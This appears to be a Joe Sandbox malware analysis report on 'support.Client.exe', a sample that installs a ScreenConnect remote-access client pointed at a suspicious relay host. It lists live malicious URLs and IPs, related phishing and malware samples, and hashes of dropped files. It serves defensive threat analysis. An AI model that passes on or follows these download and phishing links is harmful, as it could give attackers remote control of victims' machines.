https://molatoriup.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=gbakc990.top&p=8880&	5A7K8CL9.log.1.dr	false		unknown
http://www.xrml.org/schema/2001/11/xrml2coreS	dfsvc.exe, 00000001.00000002.3548401601.000001AC350BC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.WindowsFileMa	dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.galapagosdesign.com/DPlease	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.w3.o	dfsvc.exe, 00000001.00000002.3548401601.000001AC35426000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.WindowsCl	dfsvc.exe, 00000001.00000002.3548401601.000001AC357E5000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.fonts.com	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://molatoriup.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config%	dfsvc.exe, 00000001.00000002.3571640201.000001AC4F5F8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.urwpp.deDPlease	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://molatoriup.icu/Bin/ScreenConnect.WindowsBackstageShell.exeo	dfsvc.exe, 00000001.00000002.3570203959.000001AC4F48C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	dfsvc.exe, 00000001.00000002.3548401601.000001AC35031000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3548540826.0000000001732000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000002.00000003.1702974941.000001F535962000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr, qmgr.db.2.dr	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.WindowsBackstageS	dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.application7a5c561934e089	ScreenConnect.WindowsClient.exe, 00000006.00000002.1983924589.00000000012A0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.WindowsFileManager.ex8	dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.applicationX	ScreenConnect.WindowsClient.exe, 00000006.00000002.1985585178.0000000002E9F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.applicationdb01h	ScreenConnect.WindowsClient.exe, 00000006.00000002.1984772355.00000000012E6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.application_	dfsvc.exe, 00000001.00000002.3570203959.000001AC4F48C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.xrml.org/schema/2001/11/xrml2core	dfsvc.exe, 00000001.00000002.3548401601.000001AC350BC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.w3.or	dfsvc.exe, 00000001.00000002.3548401601.000001AC35347000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35433000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3570203959.000001AC4F4C7000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC354A8000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.applicatione	dfsvc.exe, 00000001.00000002.3546506844.000001AC33415000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.ver)	svchost.exe, 00000002.00000002.3351685430.000001F535A00000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.12.dr	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://molatoriup.icu	dfsvc.exe, 00000001.00000002.3548401601.000001AC35579000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC357E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35031000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.applications	ScreenConnect.WindowsClient.exe, 00000006.00000002.1984772355.00000000012E6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers/cabarga.htmlN	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000002.00000003.1702974941.000001F535962000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.ClientSer	dfsvc.exe, 00000001.00000002.3548401601.000001AC35579000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.jiyu-kobo.co.jp/	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://feedback.screenconnect.com/Feedback.axd	ScreenConnect.Core.dll0.1.dr	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.C	dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.fontbureau.com/designers8	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://molatoriup.icu/Bin/ScreenConnect.WindowsClient.exe.configO	dfsvc.exe, 00000001.00000002.3570203959.000001AC4F48C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.application.8EV	dfsvc.exe, 00000001.00000002.3570203959.000001AC4F48C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.application	dfsvc.exe, 00000001.00000002.3570203959.000001AC4F48C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1985585178.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1983924589.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1984772355.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1985585178.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1985585178.0000000002E9F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.applicationP	dfsvc.exe, 00000001.00000002.3569616028.000001AC4F42C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl3.dig	dfsvc.exe, 00000001.00000002.3570203959.000001AC4F4C7000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
31.42.187.211	molatoriup.icu	Ukraine		30860	YURTEH-ASUA	true
31.42.187.210	gbakc990.top	Ukraine		30860	YURTEH-ASUA	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1526279
Start date and time:	2024-10-05 01:02:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	support.Client.exe
Detection:	MAL
Classification:	mal54.evad.winEXE@17/75@2/3
EGA Information:	Successful, ratio: 83.3%
HCA Information:	Successful, ratio: 61% Number of executed functions: 201 Number of non-executed functions: 27
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240, 192.229.221.95, 184.28.90.27, 20.42.65.92
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 4904 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: support.Client.exe

Simulations

Behavior and APIs

Time	Type	Description
19:03:22	API Interceptor	5470217x Sleep call for process: dfsvc.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	https://clicktracking.yellowbook.com/trackingenginewebapp/tracking.html?MB_ID=256862&SE_ID=9&AG_ID=2952701&AD_ID=6851395&kw=restaurants%20near%20me&kw_type=p&C_ID=874339&SE_AD_ID=73873744870314&se_clk_id=0651300f23401ca1b2e355991fb49377&hibu_site=0&redirect_url=https://www.keybag.nl/image/arull.php?7120797967704b5369323074645079557a504c456e4d53532f4b7a79394c4c556c4e7a73684d7a64644c7a732f564b386a524c366b494364454841413d3dmaggie@proctorlane.com	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://www.sexpartnercommunity.com/?e7ak3e0m=53623575&tba4bck7=eyJpdiI6ImpWVEY0ZDdkQm5HdVdYbG1TZlViRnc9PSIsInZhbHVlIjoiQkFHK29UL2Y4SFQ5MHVsUWEvMzI3ZHprWlhDTVc3c0NNM1ZnOVBCMU5QQStjWVhXa25mc0d4WTZ2VUhURzMzc2tSSXZwZU4zclVEY3l4UTNNVWtZbHVYVlR3WXh0UVJIRS9lTVFWKzZIU0VScGY5Nm9OcSttT0pVV2Z5UnJ3bHJ5M2dGMjVnZmdFczlxMjk3Z1ZDMHpienBjbTFhaSt1RkxxZFVpS1lrZlJ4d1VzSFlQY3pGRXhmOUhyNlp2WEY3IiwibWFjIjoiOTQyNmY2NzIyNjU2NTAxYmJhMGQzZGJkNWFlZWI5ODIzMjM3OTU1ZWEyNWJlMGQ3Y2Q0ZmM5OTkzZDc2NzViMiIsInRhZyI6IiJ9&spaRoute=/amateurs/online&trk=tpidd87	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://www.sexpartnercommunity.com/?e7ak3e0m=53623575&tba4bck7=eyJpdiI6IlFXTEhvbnY0VXhhMU1tNDJDWm5Sb2c9PSIsInZhbHVlIjoiakw4QVJOVy85SFNSTHJjcmZ2ZXNuajJpcy9sU0FYYnZYZVVyUG96NElGM2FiczNmSkxzMy9DTmRmcHJxeDJoVHZyRllRdlQzTjk1czFqZFFkQzB0TFQxVW9kRENZTHNvUFBNWTRwMEY1OE1QcHhDVlkxb09pZ04ydm4rdzluNHVOeitBVnBIQ1B2QXFFRUYxTFQzUDZYSm1kYStDUnN3azlKdXVKd2xPMzcwTExVVE1TR1pYejRzVnpab2gySDcwIiwibWFjIjoiOGJmOWUwNmFmNDQwOTM3NjA5NzUzOGMzZTAyZjBkYmExYzU5MTkzNGE3YWZkMDhkNTdkNDcwNTI0MjFjNTU3MSIsInRhZyI6IiJ9&spaRoute=/amateurs/online&trk=tpc7w8d	Get hash	malicious	Unknown	Browse	192.229.221.95
	1728074285e380c4c2d339844840eb99e8ec0a75b3caf54e0387a98bfbf5e518af48a9d7df709.dat-decoded.dll	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://href.li/?https://CYT.sprenumen.ru/wJPIeL/#I#Ws-amclean@lwsd.org	Get hash	malicious	Tycoon2FA	Browse	192.229.221.95
	Play_VM-Now(Gdunphy)CQDM.htm	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://tw6v8p.uperwint.com/AP2d/#Madvisory@vistra.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	192.229.221.95
	https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.hfdzwq?v=frudxdxlqwif.htrd.iwtlt___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzoxZWJhNTM5MDhjODJhZTYyM2M5MDM3ZjkwZTI3ZjliZjo3OmUzYTI6MjUxYmEwYmY4MzRlNGZkNWNiNzBlNGJiNmNiNGQwZTMxZDYzMWE0ZGZkZmVmYWQ0MmJkNGQxNGZjNzZiYzQ0MTpoOlQ6VA#am9uYXRoYW5fbW9vcmVAdHJla2Jpa2VzLmNvbQ==	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
YURTEH-ASUA	SI HE Voy - TC Relet 11.docx.scr.exe	Get hash	malicious	AgentTesla	Browse	152.89.61.240
	MV ALEXOS_VESSEL'S DESC.docx.scr.exe	Get hash	malicious	AgentTesla	Browse	152.89.61.240
	https://r2.ddlnk.net/c/AQj0-RUQuwkYipioASC0cRmrHeGLBOb7t9m7_CWaa81LkCY1aSe2ilmnvwK5PXzQ	Get hash	malicious	Unknown	Browse	152.89.61.240
	https://campaign-statistics.com/link_click/OOIhh4OKHe_NcHPG/8cb76dcdebff138ed04c1331049114e6	Get hash	malicious	Unknown	Browse	152.89.61.240
	https://campaign-statistics.com/link_click/ODQJBme7yo_NcFtX/22e0ea1236db29f11ee5970fcc1e783c	Get hash	malicious	Unknown	Browse	152.89.61.240
	https://discountdays.ru/	Get hash	malicious	Unknown	Browse	31.42.186.237
	rC-P-0000054697.exe	Get hash	malicious	FormBook	Browse	152.89.61.240
	MR1WcAKdlh.elf	Get hash	malicious	Mirai	Browse	152.89.63.35
	nFmbhgYErw.elf	Get hash	malicious	Mirai	Browse	152.89.63.56
YURTEH-ASUA	SI HE Voy - TC Relet 11.docx.scr.exe	Get hash	malicious	AgentTesla	Browse	152.89.61.240
	MV ALEXOS_VESSEL'S DESC.docx.scr.exe	Get hash	malicious	AgentTesla	Browse	152.89.61.240
	https://r2.ddlnk.net/c/AQj0-RUQuwkYipioASC0cRmrHeGLBOb7t9m7_CWaa81LkCY1aSe2ilmnvwK5PXzQ	Get hash	malicious	Unknown	Browse	152.89.61.240
	https://campaign-statistics.com/link_click/OOIhh4OKHe_NcHPG/8cb76dcdebff138ed04c1331049114e6	Get hash	malicious	Unknown	Browse	152.89.61.240
	https://campaign-statistics.com/link_click/ODQJBme7yo_NcFtX/22e0ea1236db29f11ee5970fcc1e783c	Get hash	malicious	Unknown	Browse	152.89.61.240
	https://discountdays.ru/	Get hash	malicious	Unknown	Browse	31.42.186.237
	rC-P-0000054697.exe	Get hash	malicious	FormBook	Browse	152.89.61.240
	MR1WcAKdlh.elf	Get hash	malicious	Mirai	Browse	152.89.63.35
	nFmbhgYErw.elf	Get hash	malicious	Mirai	Browse	152.89.63.56

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://www.sexpartnercommunity.com/?e7ak3e0m=53623575&tba4bck7=eyJpdiI6ImpWVEY0ZDdkQm5HdVdYbG1TZlViRnc9PSIsInZhbHVlIjoiQkFHK29UL2Y4SFQ5MHVsUWEvMzI3ZHprWlhDTVc3c0NNM1ZnOVBCMU5QQStjWVhXa25mc0d4WTZ2VUhURzMzc2tSSXZwZU4zclVEY3l4UTNNVWtZbHVYVlR3WXh0UVJIRS9lTVFWKzZIU0VScGY5Nm9OcSttT0pVV2Z5UnJ3bHJ5M2dGMjVnZmdFczlxMjk3Z1ZDMHpienBjbTFhaSt1RkxxZFVpS1lrZlJ4d1VzSFlQY3pGRXhmOUhyNlp2WEY3IiwibWFjIjoiOTQyNmY2NzIyNjU2NTAxYmJhMGQzZGJkNWFlZWI5ODIzMjM3OTU1ZWEyNWJlMGQ3Y2Q0ZmM5OTkzZDc2NzViMiIsInRhZyI6IiJ9&spaRoute=/amateurs/online&trk=tpidd87	Get hash	malicious	Unknown	Browse	31.42.187.211
	mL-9921-myw.exe	Get hash	malicious	Unknown	Browse	31.42.187.211
	mL-9921-myw.exe	Get hash	malicious	Unknown	Browse	31.42.187.211
	GGLoader.exe	Get hash	malicious	Laplas Clipper, SilentCrypto Miner	Browse	31.42.187.211
	file.exe	Get hash	malicious	Credential Flusher	Browse	31.42.187.211
	https://m0rrisvo.za.com/Qm4nK/	Get hash	malicious	HTMLPhisher	Browse	31.42.187.211
	file.exe	Get hash	malicious	Unknown	Browse	31.42.187.211
	https://admin.hotcoinbase.com/	Get hash	malicious	Unknown	Browse	31.42.187.211
	https://rb.gy/a8jf8c	Get hash	malicious	Unknown	Browse	31.42.187.211

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	ScreenConnect.ClientSetup (1).exe	Get hash	malicious	ScreenConnect Tool	Browse
	ScreenConnect.ClientSetup (1).exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_doc_09_16_24_1120.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E_BILL9926378035.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_doc_09_16_24_1203.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E_BILL0041272508.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_doc_09_16_24_1120.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E_BILL9926378035.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_doc_09_16_24_1203.exe	Get hash	malicious	ScreenConnect Tool	Browse
C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	ScreenConnect.ClientSetup (1).exe	Get hash	malicious	ScreenConnect Tool	Browse
	ScreenConnect.ClientSetup (1).exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_doc_09_16_24_1120.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E_BILL9926378035.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_doc_09_16_24_1203.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E_BILL0041272508.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_doc_09_16_24_1120.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E_BILL9926378035.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_doc_09_16_24_1203.exe	Get hash	malicious	ScreenConnect Tool	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.363788168458258
Encrypted:	false
SSDEEP:	6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
MD5:	0E72F896C84F1457C62C0E20338FAC0D
SHA1:	9C071CC3D15E5BD8BF603391AE447202BD9F8537
SHA-256:	686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
SHA-512:	AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3108055020528622
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrKt:KooCEYhgYEL0InGC3Q3
MD5:	C5D170661AE0AB5D940D9842A4CDA8F5
SHA1:	8DF53499E7B15EE9C1BCBD29FA6A7CBB6A9FF4C7
SHA-256:	81ACB1FCB502DBCF8F2A83972EDB5D925849B139B9EE850DB15BADAE9477574A
SHA-512:	51E2CD98F6D6DC75A22596BCFB689DA3A89E2EA79C72172957809D6E8D2ABB34F284168CE0FBB15B7762E7A0A39E1EC5A6320135CC25BE069F60871EFF9D02E6
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x0b7acabd, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221662711724975
Encrypted:	false
SSDEEP:	1536:6NNNMSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUkY:6NNNMazag03A2UrzJDO
MD5:	1A6C11C87F5E4B0EAF8C247390FE8243
SHA1:	1FBA47D664E7DAAFCFCF3DD1ECE772E2938A3682
SHA-256:	DE8F2B266FC313CB09711BB8E3CE0849C52F8A0179EFF162E3530B76977070C7
SHA-512:	C3702B571035CFEF3823A1D4ABEECD4E9FB635D80C8A5EBB5710CD475C1E82270C53F3C178772DE6BB105705D5C387B3093FFCAB827ABDCACE5A665A30169B14
Malicious:	false
Preview:	.z.... .......Y.......X\...;...{......................n.%..........\|_.:....\|..h.#..........\|_.n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................R.e.....\|_.................G........\|_..........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07894100839076298
Encrypted:	false
SSDEEP:	3:uWetYeoyv2gyHG/l/FBGOym62E/l/suTE/l/allOE/tlnl+/rTc:IzI2bBod4IpMP
MD5:	5BC7447ED8BD37ECEB9812BC6A3DE168
SHA1:	EC2FD13FAB9BDF246F105CE9BBC4F8558A596760
SHA-256:	0694630E8BDB9B86C066CB43B3A13CA3096BBD38714F0AEC1AA8BA78DEEB4E29
SHA-512:	87D9C8C1E408837FFF329FF92F6E0907512C09C2589B8628AC5846E3463934F5519698AC3B3F29AA01FAA8B69DA59E7264034152B47B29EFA670E2D33AC1CE59
Malicious:	false
Preview:	CU.=.....................................;...{..:....\|.......\|_..............\|_......\|_...<w.....\|_.................G........\|_.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_support.Client.e_d4e091431b937769a4c20627e20536a24232_cff5f965_14ad0412-4421-4dfc-b2c2-d93d48ab241e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9001568934473777
Encrypted:	false
SSDEEP:	96:cE3xFFC/WsdhqvGXyf8QXIDcQvc6QcEVcw3cE/v+HbHg/JgnQoFyOuawrnYbd6H8:cUxXC/WjP0BU/ojsxlzuiFPZ24IO83
MD5:	8146DE9D564F52C8ED30A7E0FFF0A176
SHA1:	68B1440944718BADCAD0D24132D4741AFE3FC6D2
SHA-256:	9FF9787C4469545202BCE4A849FB0FC96FBF0A10DA77F66277C23487D0A480FF
SHA-512:	1C3EFED79D834E3C2C9EDC86724AC4BE50855D73F8B8BDFD08AD590C21711860137116F912F6B1192E6B4009DB8A243BD5514AD27753139AC23D89B043F6DA94
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.5.5.6.6.1.7.8.3.6.7.2.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.5.5.6.6.1.8.2.7.4.2.2.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.a.d.0.4.1.2.-.4.4.2.1.-.4.d.f.c.-.b.2.c.2.-.d.9.3.d.4.8.a.b.2.4.1.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.6.1.d.6.0.2.6.-.5.1.d.6.-.4.6.5.1.-.b.9.a.1.-.1.f.7.e.2.5.5.f.c.8.6.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.u.p.p.o.r.t...C.l.i.e.n.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.8.0.-.0.0.0.1.-.0.0.1.4.-.a.2.3.b.-.0.6.8.d.b.1.1.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.7.d.f.d.6.3.8.3.4.0.6.7.1.0.9.0.c.2.c.5.9.5.9.c.0.1.1.b.e.d.b.0.0.0.0.f.f.f.f.!.0.0.0.0.1.a.2.b.b.3.b.a.a